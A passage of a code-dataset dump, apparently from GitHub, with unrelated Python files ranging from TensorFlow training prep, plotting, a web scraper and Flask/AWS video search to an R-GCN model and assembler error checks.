f.write('\\tname:\\'{}\\'\\n'.format(label['name']))\n f.write('\\tid:{}\\n'.format(label['id']))\n f.write('}\\n')\n\nos.system(f'python {common_config.SCRIPTS_PATH}/generate_tfrecord.py -x {common_config.IMAGE_PATH}/train -l {common_config.ANNOTATION_PATH}/label_map.pbtxt -o {common_config.ANNOTATION_PATH}/train.record')\nos.system(f'python {common_config.SCRIPTS_PATH}/generate_tfrecord.py -x {common_config.IMAGE_PATH}/test -l {common_config.ANNOTATION_PATH}/label_map.pbtxt -o {common_config.ANNOTATION_PATH}/test.record')\n\nos.system(f'wget {common_config.model_config[\"pretrained_model_url\"]} -P {common_config.PRETRAINED_MODEL_PATH}')\n\ncompressed_pretrained_model = glob.glob(f'{common_config.PRETRAINED_MODEL_PATH}/*.tar.gz')[0]\nshutil.unpack_archive(compressed_pretrained_model, extract_dir=common_config.PRETRAINED_MODEL_PATH)\nos.remove(compressed_pretrained_model)\n\npretrained_model_name = next(os.scandir(common_config.PRETRAINED_MODEL_PATH)).name\n\nif os.path.exists(common_config.MODEL_PATH) and os.getenv('CLEAN_UP_WORKSPACE') == '1':\n shutil.rmtree(common_config.MODEL_PATH)\n\nif not os.path.exists(common_config.MODELS_PATH):\n os.mkdir(common_config.MODELS_PATH)\n\nif not os.path.exists(common_config.MODEL_PATH):\n os.mkdir(common_config.MODEL_PATH)\n\nCONFIG_PATH = f'{common_config.PRETRAINED_MODEL_PATH}/{pretrained_model_name}/pipeline.config'\n\nshutil.copy(CONFIG_PATH, common_config.MODEL_PATH)\n\n\n\nimport tensorflow as tf\nfrom object_detection.utils import config_util\nfrom object_detection.protos import pipeline_pb2\nfrom google.protobuf import text_format\n\npipeline_config = pipeline_pb2.TrainEvalPipelineConfig()\nwith tf.io.gfile.GFile(common_config.CUSTOM_MODEL_CONFIG, \"r\") as f: \n proto_str = f.read() \n text_format.Merge(proto_str, pipeline_config) \n\npipeline_config.model.ssd.num_classes = len(labels)\npipeline_config.train_config.batch_size = common_config.model_config['train_batch_size']\npipeline_config.train_config.fine_tune_checkpoint = f'{common_config.PRETRAINED_MODEL_PATH}/{pretrained_model_name}/checkpoint/ckpt-0'\npipeline_config.train_config.fine_tune_checkpoint_type = \"detection\"\npipeline_config.train_input_reader.label_map_path= f'{common_config.ANNOTATION_PATH}/label_map.pbtxt'\npipeline_config.train_input_reader.tf_record_input_reader.input_path[:] = [f'{common_config.ANNOTATION_PATH}/train.record']\npipeline_config.eval_input_reader[0].label_map_path = f'{common_config.ANNOTATION_PATH}/label_map.pbtxt'\npipeline_config.eval_input_reader[0].tf_record_input_reader.input_path[:] = [f'{common_config.ANNOTATION_PATH}/test.record']\n\nconfig_text = text_format.MessageToString(pipeline_config)\nwith tf.io.gfile.GFile(common_config.CUSTOM_MODEL_CONFIG, \"wb\") as f: \n f.write(config_text)\n\nwith open(f'/train.sh', 'w') as f:\n f.write(f'python {common_config.APIMODEL_PATH}/research/object_detection/model_main_tf2.py '\n f'--model_dir={common_config.MODEL_PATH} '\n f'--pipeline_config_path={common_config.CUSTOM_MODEL_CONFIG} '\n f'--num_train_steps={common_config.model_config[\"num_train_steps\"]}')","repo_name":"MadLadLabs/TensorflowObjectDetectionApiTrainingInDocker","sub_path":"src/prepare_training_data_set.py","file_name":"prepare_training_data_set.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"2032916977","text":"#使用scatter()绘制散点图并设置其样式\nimport matplotlib.pyplot as plt\n#通过x轴的数据自动计算y轴的数据值\nx_values = list(range(1,1001))\ny_values = [x**2 for x in x_values]\n\"\"\"\n数据点默认为蓝色的点黑色的轮廓,edgecolor选项可讲黑色的轮廓删除,从而就只剩蓝色的实心点了\nc选项设置颜色,可直接指定颜色名称或者用自定义颜色c=(0,0,0.8)\nc设置成一个数值y值列表,再设置cmap参数告诉pyplot使用哪个颜色映射\n\"\"\"\nplt.scatter(x_values,y_values,c=y_values,cmap=plt.cm.BuPu,edgecolor='none',s=10)\n#设置图标题并给坐标轴加上标签\nplt.title(\"Square Numbers\",fontsize=24)\nplt.xlabel(\"Value\",fontsize=14)\nplt.ylabel(\"Square of Value\",fontsize=14)\n#设置刻度标记的大小,x、y轴都影响只显示主刻度\nplt.tick_params(axis='both',which='major',labelsize=20)\n#设置x,y坐标的取值范围\nplt.axis([0,1000,0,1000000])\n#plt.show()\nplt.savefig('squares_plot.png',bbox_inches='tight')","repo_name":"wanqiangliu/python","sub_path":"matplotlib/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34565174592","text":"from scipy.io import loadmat, savemat\nimport numpy as np\nimport imageio\nimport os\nimport cv2\nfrom PIL import Image\n\npth = \"rosbag_reader\\\\test\"\nmat_pth = \"rosbag_reader\\\\test\\\\joint_test_data_with_depth.mat\"\nannot_data = loadmat(mat_pth)\njoints = annot_data['joint_uvd']\nprint(joints.shape)\n# print(joints)\n\n# jnt = []\n# batch = []\n# annot = []\n\n# data = annot_data['joint_uvd']\n# if data.shape[0] == 1 and data.shape[1] > 0:\n# for i in range(data.shape[1]):\n# if i < 68:\n# batch.append(data[0,i,:,:])\n\nfor sample_index in range(69, joints.shape[1]):\n print(sample_index)\n kpanno = joints[0, sample_index, :, :]\n imagefile = 'rgb_1_'+ str(sample_index+1).zfill(7) +'.jpg'\n image_RGB = imageio.imread(os.path.join(pth, imagefile))\n\n image = np.zeros_like(image_RGB)\n image[:,:,0] = image_RGB[:,:,-1]\n image[:,:,1] = image_RGB[:,:,1]\n image[:,:,2] = image_RGB[:,:,0]\n # if sample_index > 67:\n # orig_image = cv2.resize(image_RGB, dsize=(480, 480), interpolation=cv2.INTER_CUBIC)\n # im = Image.fromarray(np.asanyarray(orig_image).astype('uint8'))\n # im.save(\"bigger/rgb_1_\"+ str(sample_index+1).zfill(7) +'.jpg')\n\n for i in range(kpanno.shape[0]):\n x = kpanno[i, 0]\n y = kpanno[i, 1]\n image = cv2.circle(image, (int(x), int(y)), 5, (0,0,255), 2)\n # if sample_index > 67:\n # jnt.append(np.array([int((x*1.875)), int(y*1.875), 1]))\n\n # if sample_index > 67:\n # batch.append(np.array(jnt))\n # jnt = []\n cv2.imshow('Annotaded image', image)\n cv2.waitKey(0)\n# annot = [np.array(batch)]\n# savemat('joint_data_test.mat', {'joint_uvd': np.array(annot)})","repo_name":"bordac6/DiplomovaPraca","sub_path":"codes/annotator/readMat.py","file_name":"readMat.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6201720442","text":"menu = ['osh' , 'qazonkabob', 'shashlik' , 'norin','somsa']\nbuyurtmalar = ['osh' , 'somsa', 'manti' , 'shashlik']\n\nif buyurtmalar:\n for taom in buyurtmalar:\n if taom in menu:\n print(f\" Menuda {taom} bor. \")\n else:\n print(f\"Kechirasiz , menuda {taom} yo'q.\")\n\nelse:\n print(\"Savatchangiz bo'sh. \")\n\ninput()\n","repo_name":"RuzimovJavlonbek/anvar.nazrullayevning-mohirdev.uz-platformasidagi-dasturlash.asoslari.python-kursidagi-amaliyotlar","sub_path":"sariq_dev/darslar/11_dars_urganish_7_.py","file_name":"11_dars_urganish_7_.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39601451766","text":"import base64\nimport json\nimport logging\nimport os\nimport uuid\nfrom decimal import Decimal\n\nimport boto3\n\nfrom entities.product import Product\nfrom facades.product_facade import ProductFacade\nfrom repositories.product_dynamodb_repository import ProductDynamodbRepository\nfrom repositories.product_s3_repository import ProductS3Repository\nfrom services.product_service import ProductService\n\nproduct_dynamodb_repository: ProductDynamodbRepository = ProductDynamodbRepository()\nproduct_s3_repository: ProductS3Repository = ProductS3Repository()\nproduct_service: ProductService = ProductService(\n product_dynamodb_repository, product_s3_repository\n)\nproduct_facade: ProductFacade = ProductFacade(product_service)\n\n\ndef get_headers():\n return {\n \"Access-Control-Allow-Headers\": \"*\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"*\"\n }\n\ndef insert_handler(event, context):\n body = json.loads(event[\"body\"])\n\n extension = os.path.splitext(body[\"fileName\"])[1]\n\n product_id = str(uuid.uuid4())\n product_dict = {\n \"Id\": product_id,\n \"Name\": body[\"name\"],\n \"Rating\": str(body[\"rating\"]),\n \"Author\": body[\"author\"],\n \"Price\": str(body[\"price\"]),\n \"FileName\": product_id + extension,\n }\n\n base64_image = body.get(\"filebase64\")\n if base64_image:\n image = base64.b64decode(base64_image)\n\n product = Product(\n product_id,\n product_dict.get(\"Name\"),\n product_dict.get(\"Author\"),\n product_dict.get(\"Rating\"),\n product_dict.get(\"Price\"),\n product_dict.get(\"FileName\"),\n )\n\n product_facade.create(product, image)\n\n response = {\n 'statusCode': 200,\n 'headers': get_headers(),\n 'body': json.dumps(f\"Product inserted successfully {product}!\")\n }\n\n return response\n\n\ndef update_handler(event, context):\n body = json.loads(event[\"body\"])\n\n product_id = body.get(\"Id\")\n file_name = body.get(\"file_name\")\n\n product_dict = {\n \"Id\": product_id,\n \"Name\": body[\"name\"],\n \"Rating\": str(body[\"rating\"]),\n \"Author\": body[\"author\"],\n \"Price\": str(body[\"price\"]),\n \"FileName\": file_name,\n }\n\n base64_image = body.get(\"filebase64\")\n if base64_image:\n image = base64.b64decode(base64_image)\n\n product = Product(\n product_id,\n product_dict.get(\"Name\"),\n product_dict.get(\"Author\"),\n product_dict.get(\"Rating\"),\n product_dict.get(\"Price\"),\n product_dict.get(\"FileName\"),\n )\n\n product_facade.update(product_id, product, image)\n\n response = {\n \"statusCode\": 200,\n 'headers': get_headers(),\n \"body\": json.dumps(f\"Product updated successfully {product}!\"),\n }\n\n return response\n\n\ndef delete_handler(event, context):\n body = json.loads(event[\"body\"])\n\n product_id = body[\"Id\"]\n\n product_facade.delete(product_id)\n\n response = {\n \"statusCode\": 200,\n 'headers': get_headers(),\n \"body\": json.dumps(f\"Product deleted successfully {product_id}!\"),\n }\n\n return response\n","repo_name":"Jokebede-Coimbra/ProjetoPython","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"46376886494","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup as BS\n\n\n\nHOST = 'https://www.kivano.kg/'\n\ndef get_html(url):\n response = requests.get(url)\n return(response.text)\n\ndef get_total_pages(html):\n soup = BS(html, 'lxml')\n pages_ul = soup.find('div', class_= \"pager-wrap\").find('ul')\n last_page = pages_ul.find_all('li') [-1]\n total_page = last_page.find('a').get('href').split('=')[-1]\n return int(total_page)\n\ndef write_to_csv(data):\n with open('kivano_notebooks.csv', 'a') as csv_file:\n writer = csv.writer(csv_file, delimiter='/')\n writer.writerow((data['title'], \n data['price'],\n data['photo']))\n\ndef get_page_data(html):\n soup = BS(html, 'lxml')\n product_list = soup.find('div', class_=\"list-view\")\n products = product_list.find_all('div', class_=\"item product_listbox oh\")\n\n for product in products:\n try:\n \n photo = HOST + product.find('div', class_=\"listbox_img pull-left\").find('a').find('img').get('src')\n\n except:\n photo = ''\n\n try:\n title = product.find('div', class_='listbox_title oh').find('a').text\n \n except:\n title = ''\n try:\n price = product.find('div', class_='listbox_price text-center').find('strong').text\n \n except:\n price = ''\n\n data = {'title': title, 'price': price, 'photo': photo}\n write_to_csv(data)\n\n\ndef main():\n notebook_url = 'https://www.kivano.kg/noutbuki'\n pages = '?page='\n \n total_pages = get_total_pages(get_html(notebook_url))\n \n for page in range(1, total_pages+1):\n url_with_page = notebook_url + pages + str(page)\n html = get_html(url_with_page)\n get_page_data(html)\n\n\n\nmain() \n\n","repo_name":"azatdauletov/parsing","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23027974318","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch.conv import RelGraphConv\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nimport os\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n\n\"\"\"\nhttps://docs.dgl.ai/tutorials/models/1_gnn/4_rgcn.html#sphx-glr-tutorials-models-1-gnn-4-rgcn-py\n\"\"\"\n\n\ndef model_from_hparams(hparams, verbose=True):\n \"\"\"\n Just interfacing to create a model directly from an hparam file\n :param hparams:\n :return:\n \"\"\"\n num_rels = hparams.get('argparse', 'num_edge_types')\n model = Model(dims=hparams.get('argparse', 'embedding_dims'),\n self_loop=hparams.get('argparse', 'self_loop'),\n conv_output=hparams.get('argparse', 'conv_output'),\n num_rels=num_rels,\n num_bases=-1,\n similarity=hparams.get('argparse', 'similarity'),\n verbose=verbose)\n return model\n\n\nclass Embedder(nn.Module):\n\n def __init__(self,\n dims,\n num_rels=19,\n num_bases=-1,\n conv_output=False,\n self_loop=False,\n verbose=True):\n super(Embedder, self).__init__()\n self.dims = dims\n self.conv_output = conv_output\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.self_loop = self_loop\n self.verbose = verbose\n\n self.layers = self.build_model()\n if self.verbose:\n print(self.layers)\n print(\"Num rels: \", self.num_rels)\n\n def build_model(self):\n layers = nn.ModuleList()\n\n short = self.dims[:-1]\n last_hidden, last = self.dims[-2:]\n if self.verbose:\n print(\"short, \", short)\n print(\"last_hidden, last \", last_hidden, last)\n\n # input feature is just node degree\n i2h = self.build_hidden_layer(1, self.dims[0])\n layers.append(i2h)\n\n for dim_in, dim_out in zip(short, short[1:]):\n # print('in',dim_in, dim_out)\n h2h = self.build_hidden_layer(dim_in, dim_out)\n layers.append(h2h)\n # hidden to output\n h2o = self.build_output_layer(last_hidden, last)\n # print('last',last_hidden,last)\n layers.append(h2o)\n return layers\n\n @property\n def current_device(self):\n \"\"\"\n :return: current device this model is on\n \"\"\"\n return next(self.parameters()).device\n\n def build_hidden_layer(self, in_dim, out_dim):\n return RelGraphConv(in_dim, out_dim, self.num_rels,\n num_bases=self.num_bases,\n activation=F.relu,\n self_loop=self.self_loop)\n\n # No activation for the last layer\n def build_output_layer(self, in_dim, out_dim, conv=False):\n if self.conv_output:\n return RelGraphConv(in_dim, out_dim,\n self.num_rels,\n num_bases=self.num_bases,\n self_loop=self.self_loop,\n activation=None)\n else:\n return nn.Linear(in_dim, out_dim)\n\n def forward(self, g):\n # h = g.in_degrees().view(-1, 1).float().to(self.current_device)\n h = torch.ones(len(g.nodes())).view(-1, 1).to(self.current_device)\n for i, layer in enumerate(self.layers):\n # layer(g)\n if not self.conv_output and (i == len(self.layers) - 1):\n h = layer(h)\n else:\n h = layer(g, h, g.edata['one_hot'])\n g.ndata['h'] = h\n return g.ndata['h']\n\n\n###############################################################################\n# Define full R-GCN model\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Model(nn.Module):\n def __init__(self,\n dims,\n num_rels,\n num_bases=-1,\n conv_output=True,\n self_loop=False,\n hard_embed=False,\n similarity=True,\n normalize=False,\n weighted=False,\n verbose=True):\n \"\"\"\n\n :param dims: the embeddings dimensions, a list of type [128,128,32]\n :param attributor_dims: the number of motifs to look for\n :param num_rels: the number of possible edge types\n :param num_bases: technical rGCN option\n\n :param rec: the constant in front of reconstruction loss\n :param mot: the constant in front of motif detection loss\n :param orth: the constant in front of dictionary orthogonality loss\n :param scaled: if we want to scale the loss by attribution norm\n :param similarity: if we want to use cosine similarities instead of distances everywhere\n\n :param attribute: Whether we want the network to use the attribution module\n :param convolute: If we want to use a rgcn also for the attributions\n\n \"\"\"\n super(Model, self).__init__()\n self.verbose = verbose\n self.dims = dims\n self.dimension_embedding = dims[-1]\n\n self.num_rels = num_rels\n self.num_bases = num_bases\n\n self.similarity = similarity\n self.normalize = normalize\n self.weighted = weighted\n self.self_loop = self_loop\n\n # create rgcn layers for the embedder\n self.embedder = Embedder(dims=dims,\n num_rels=num_rels,\n num_bases=num_bases,\n self_loop=self_loop,\n conv_output=conv_output,\n verbose=verbose)\n\n def forward(self, g):\n # If hard embed, the embeddings are directy g.ndata['h'], otherwise we compute them and put them here\n self.embedder(g)\n\n # If using similarity as a supervision, we should normalize the embeddings, as their norm got unconstrained\n if self.similarity and self.normalize:\n g.ndata['h'] = F.normalize(g.ndata['h'], p=2, dim=1)\n return g.ndata['h']\n\n @property\n def current_device(self):\n \"\"\"\n :return: current device this model is on\n \"\"\"\n return next(self.parameters()).device\n\n # Below are loss computation function related to this model\n @staticmethod\n def matrix_cosine(a, b, eps=1e-8):\n \"\"\"\n added eps for numerical stability\n \"\"\"\n a_n, b_n = a.norm(dim=1)[:, None], b.norm(dim=1)[:, None]\n a_norm = a / torch.max(a_n, eps * torch.ones_like(a_n))\n b_norm = b / torch.max(b_n, eps * torch.ones_like(b_n))\n sim_mt = torch.mm(a_norm, b_norm.transpose(0, 1))\n return sim_mt\n\n @staticmethod\n def matrix_dist(a, plus_one=False):\n \"\"\"\n Pairwise dist of a set of a vector of size b\n returns a matrix of size (a,a)\n :param a : a torch Tensor of size a,b\n :param plus_one: if we want to get positive values\n \"\"\"\n if plus_one:\n return torch.norm(a[:, None] - a, dim=2, p=2) + 1\n return torch.norm(a[:, None] - a, dim=2, p=2)\n\n @staticmethod\n def weighted_MSE(output, target, weight):\n if weight is None:\n return torch.nn.MSELoss()(output, target)\n return torch.mean(weight * (output - target) ** 2)\n\n def rec_loss(self, embeddings, target_K, graph=None):\n \"\"\"\n :param embeddings: The node embeddings\n :param target_K: The similarity matrix\n :return:\n \"\"\"\n if self.similarity:\n if self.normalize:\n K_predict = self.matrix_cosine(embeddings, embeddings)\n else:\n K_predict = torch.mm(embeddings, embeddings.t())\n\n else:\n K_predict = self.matrix_dist(embeddings)\n target_K = torch.ones(target_K.shape, device=target_K.device) - target_K\n\n if self.weighted:\n assert graph is not None\n import networkx as nx\n nx_graph = graph.to_networkx(edge_attrs=['one_hot'])\n nx_graph = nx.to_undirected(nx_graph)\n ordered = sorted(nx_graph.nodes())\n adj_matrix_full = nx.to_scipy_sparse_matrix(nx_graph, nodelist=ordered)\n\n # copy the matrix with only the non canonical\n extracted_edges = [(u, v) for u, v, e in nx_graph.edges.data('one_hot', default='0')\n if e not in [0, 6]]\n extracted_graph = nx.Graph()\n extracted_graph.add_nodes_from(ordered)\n extracted_graph.add_edges_from(extracted_edges)\n extracted_graph = nx.to_undirected(extracted_graph)\n adj_matrix_small = nx.to_scipy_sparse_matrix(extracted_graph, nodelist=ordered)\n\n # This is a matrix with non zero entries for non canonical relationships\n # One must then expand it based on the number of hops\n adj_matrix_full = np.array(adj_matrix_full.todense())\n adj_matrix_small = np.array(adj_matrix_small.todense())\n\n expanded_connectivity = [np.eye(len(adj_matrix_full))]\n for _ in self.dims[:-1]:\n expanded_connectivity.append(expanded_connectivity[-1] @ adj_matrix_full)\n expanded_connectivity = np.sum(expanded_connectivity, axis=0)\n\n # What we are after is a matrix for which you start with a walk of len < max_len\n # that starts with node i and that ends with a non canonical with j\n # ie : all neighborhoods that include a non canonical.\n # multiplying on the left yields walks that start with a non canonical on the rows\n # expanded_connectivity_left = np.array(adj_matrix_small @ expanded_connectivity)\n expanded_connectivity_right = np.array(expanded_connectivity @ adj_matrix_small)\n enhanced = np.sum(expanded_connectivity_right, axis=0)\n enhanced = np.clip(enhanced, a_min=0, a_max=1)\n fraction = np.sum(enhanced) / len(enhanced)\n enhanced = ((1 / (fraction + 0.005)) * enhanced) + 1\n weight = np.outer(enhanced, enhanced)\n weight /= np.mean(weight)\n weight = torch.from_numpy(weight)\n return self.weighted_MSE(K_predict, target_K, weight)\n\n reconstruction_loss = torch.nn.MSELoss()(K_predict, target_K)\n return reconstruction_loss\n","repo_name":"cgoliver/vernal","sub_path":"train_embeddings/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"71462710808","text":"from flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nimport os\nimport boto3\nimport uuid\nimport cv2\nimport tempfile\nimport shutil\nimport json\nimport torch\nfrom PIL import Image\nimport clip\nimport pinecone\n\napp = Flask(__name__, static_folder='../panoptes-ui/build')\nindex = pinecone.Index(\"panoptes-frame-vectors-shadow\")\nmodel, preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\nmodel_obj = {\"model\": model, \"preprocess_fn\": preprocess}\nCORS(app)\n\ndef invoke_sagemaker_endpoint(bucket_name, video_name, user_id):\n try:\n endpoint_name = \"clip-inference-endpoint\"\n payload = json.dumps({\n \"bucket_name\": 'user-1234',\n \"user_id\": user_id})\n\n sagemaker_runtime_client = boto3.client('sagemaker')\n response = sagemaker_runtime_client.invoke_endpoint(\n EndpointName=endpoint_name,\n ContentType='application/json',\n Body=payload\n )\n result = json.loads(response['Body'].read().decode())\n except:\n print(\"ZzzZ\")\n return \"Executed\"\n\n@app.route('/generate-userid', methods=['GET'])\ndef generate_user_id():\n user_id = str(uuid.uuid4())\n return {'success': True, 'userId': user_id}\n\n@app.route('/create-bucket', methods=['POST'])\ndef create_bucket():\n user_id = request.json.get('userId')\n if not user_id:\n return {'success': False, 'message': 'User ID is required'}\n \n s3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='############', \n aws_secret_access_key='############')\n\n bucket_name = 'user-' + user_id\n s3.create_bucket(Bucket=bucket_name)\n return {'success': True, 'bucketName': bucket_name}\n\n@app.route('/indexvideo', methods=['POST'])\ndef upload_file():\n s3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='###########', \n aws_secret_access_key='##########')\n \n file = request.files['file']\n bucket_name = request.form['bucketName']\n\n if file:\n try:\n temp_dir = tempfile.mkdtemp()\n file_path = os.path.join(temp_dir, file.filename)\n file.save(file_path)\n video = cv2.VideoCapture(file_path)\n frame_rate = video.get(cv2.CAP_PROP_FPS)\n frame_num = 0\n print(\"Frame Rate :\", frame_rate)\n while True:\n ret, frame = video.read()\n if ret:\n if frame_num % frame_rate == 0:\n frame_file = os.path.join(temp_dir, f'frame_{frame_num:04d}.jpg')\n cv2.imwrite(frame_file, frame)\n with open(frame_file, 'rb') as data:\n s3.upload_fileobj(data, bucket_name, f'images_{file.filename}/frame_{frame_num:04d}.jpg')\n frame_num += 1\n else:\n break\n video.release()\n shutil.rmtree(temp_dir)\n _ = invoke_sagemaker_endpoint(bucket_name, file.name, str(uuid.uuid4()))\n return {\"success\": True}\n except Exception as e:\n return {\"success\": False, \"message\": str(e)}\n\n return {\"success\": False, \"message\": \"No file provided\"}\n\n@app.route('/search', methods=['POST'])\ndef search():\n data = request.get_json()\n query = data.get('query')\n query_tokens = clip.tokenize([query]).to(\"cpu\")\n\n with torch.no_grad():\n query_features = model.encode_text(query_tokens)\n query_features = query_features.cpu().numpy().tolist()[0]\n\n query_response = index.query(\n namespace='user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a',\n top_k=5,\n include_metadata=True,\n vector=query_features,\n filter={\n 'video': {'$in': ['images_10secsimple_cup_beach.mp4']}\n }\n )\n\n print(query_response)\n\n timestamps = [int(id) for id in query_response.ids]\n return jsonify({\"timestamps\": timestamps, \"status\": 200})\n\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef serve(path):\n if path != \"\" and os.path.exists(app.static_folder + '/' + path):\n return send_from_directory(app.static_folder, path)\n else:\n return send_from_directory(app.static_folder, 'index.html')\n\nif __name__ == '__main__':\n app.run(port=3001)","repo_name":"Vi-Sri/panoptes-service","sub_path":"panoptes-app/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74943015448","text":"def haltError(lst,linelist):\n if lst[-1]!=['hlt']:\n return 0,linelist[-1]\n for i in range(len(lst)-1):\n if lst[i]==['hlt']:\n return -1,linelist[i]\n return 1,0\n\n#print(haltError(lst))\ndef VarList(lst,varlist,linelist): #ins_l,[]\n i=0\n while lst[i][0]=='var':\n if len(lst[i])>2:\n return -1,linelist[i]\n varlist.append(lst[i][1])\n i+=1\n j=i\n for i in range(j,len(lst)):\n if lst[i][0]=='var':\n return -1,linelist[i]\n return 1,0\n\n\ndef Labellist(lst,labellist): #ins_l,[]\n i=0\n for i in range(len(lst)):\n # if len(lst[i])>1 and lst[i][1][-1]==\":\":\n # return -1\n if lst[i][0][-1]==\":\":\n labellist.append(lst[i][0][:-1])\n \n return 1,0\n \n\ndef UndefinedVariables(lst,varlist,labellist,linelist): #ins_l, varlist, labellist\n for i in range(len(lst)):\n if lst[i][0] in [\"ld\",\"st\"]:\n y=lst[i][-1]\n if y not in varlist and y not in labellist:\n return -1,linelist[i]\n elif y not in varlist and y in labellist:\n return 0,linelist[i]\n return 1,0\n \n \n \ndef UndefinedLabels(lst,varlist,labellist,linelist): #ins_l,varlist,labellist\n for i in range(len(lst)):\n if lst[i][0] in [\"jmp\",\"jgt\",\"je\",\"jlt\"]:\n y=lst[i][-1]\n if y not in labellist and y not in varlist:\n return -1,linelist[i]\n elif y not in labellist and y in varlist:\n return 0,linelist[i]\n return 1,0\n \n \ndef ImmediateError(lst,linelist): #insl_l\n for i in range(len(lst)):\n if lst[i][0]==\"mov\" and lst[i][2][0]==\"$\":\n if int(lst[i][2][1:])<0 or int(lst[i][2][1:])>255:\n return -1,linelist[i]\n elif lst[i][0] in [\"ls\",\"rs\"]:\n if lst[i][2][0]!=\"$\":\n return 0,linelist[i]\n elif int(lst[i][2][1:])<0 or int(lst[i][2][1:])>255:\n return -1,linelist[i]\n return 1,0\n\ndef IllegalFlag(lst,linelist): #insl_l\n for i in range(len(lst)):\n if lst[i][0] in [\"add\",\"sub\",\"mul\",\"xor\",\"or\",\"and\"]:\n if lst[i][1]==\"FLAGS\" or lst[i][2]==\"FLAGS\" or lst[i][3]==\"FLAGS:\":\n return -1,linelist[i]\n elif lst[i][0] in [\"cmp\",\"not\",\"div\"]:\n if lst[i][1]==\"FLAGS\" or lst[i][2]==\"FLAGS\":\n return -1,linelist[i]\n elif lst[i][0] in [\"mov\",\"ld\",\"st\",\"rs\",\"ls\"]:\n if lst[i][1]==\"FLAGS\":\n return -1,linelist[i]\n return 1,0\n\n\n\ndef is_valid_opcode(ins_l,linelist):\n\n #check if length is correct\n\n d=[' ','add','sub','mov','ld','st','mul','div','rs','ls',\n 'xor','or','and','not','cmp','jmp','jlt','jgt','je','hlt',\n 'var']\n\n for i in range(len(ins_l)):\n if (ins_l[i][0][-1]==\":\"):\n continue\n elif ins_l[i][0] not in d:\n return -1,linelist[i]\n \n return 1,0\n\n\ndef error_len(ins_l,linelist):\n\n d={'add':4,'sub':4,'mov':3,'ld':3,'st':3,'mul':4,'div':3,'rs':3,'ls':3,'xor':4,'or':4,'and':4,\n 'not':3,'cmp':3,'jmp':2,'jlt':2,'jgt':2,'je':2,'hlt':1,'var':2}\n\n for i in range(len(ins_l)):\n if (ins_l[i][0][-1]==\":\"):\n continue\n if (len(ins_l[i])!=d[ins_l[i][0]]):\n # print(i)\n return -1,linelist[i]\n \n return 1,0\n\n\ndef reg_error_l1(l1):\n\n # is it between R0 and R6\n #the first letter is a R and not a,b,c,d or r\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg=l1[1]\n\n\n if (reg not in regl):\n return -1\n\n return 1\n\ndef reg_error_l2(l2):\n\n reg1=l2[1]\n reg2=l2[2]\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n if (reg1 not in regl) or (reg2 not in regl):\n return -1\n\n return 1\n \n\ndef reg_error_l3(l3):\n\n reg1=l3[1]\n reg2=l3[2]\n reg3=l3[3]\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n \n if (reg1 not in regl) or (reg2 not in regl) or (reg3 not in regl):\n return -1\n\n return 1\n\ndef check_mov(l,linelist):\n\n if (l[-1][0]=='$' and l[0][0]!='$'):\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg=l[0]\n fc=reg[0]\n if (reg not in regl):\n return -1\n \n return 1\n\n elif (l[0][0]=='$'):\n return -1 \n\n else:\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg1=l[0]\n reg2=l[1]\n\n fc1=reg1[0]\n fc2=reg2[0]\n if (reg1 not in regl) or (reg2 not in regl):\n return -1\n \n return 1\n\ndef syntax_error(ins_l,linelist):\n\n l1=[]\n l2=[]\n l3=[]\n\n d3=['add','sub','mul','xor','or','and']\n d2=['div','not','cmp']\n d1=['ls','rs','ld','st']\n\n for i in range(len(ins_l)):\n if ins_l[i][0][-1]==\":\":\n continue\n if ins_l[i][0]=='mov':\n a=check_mov(ins_l[i][1:],linelist)\n if (a==-1):\n return -1,linelist[i]\n\n elif ins_l[i][0] in d1:\n l1.append(ins_l[i])\n\n elif ins_l[i][0] in d2:\n l2.append(ins_l[i])\n\n elif ins_l[i][0] in d3:\n l3.append(ins_l[i])\n\n # print(l1)\n # print(l2)\n # print(l3)\n \n\n\n for i in range(len(ins_l)):\n if ins_l[i] in l1:\n e1=reg_error_l1(ins_l[i])\n if(e1==-1):\n return -1,linelist[i]\n\n if ins_l[i] in l2:\n e2=reg_error_l2(ins_l[i])\n\n if (e2==-1):\n return 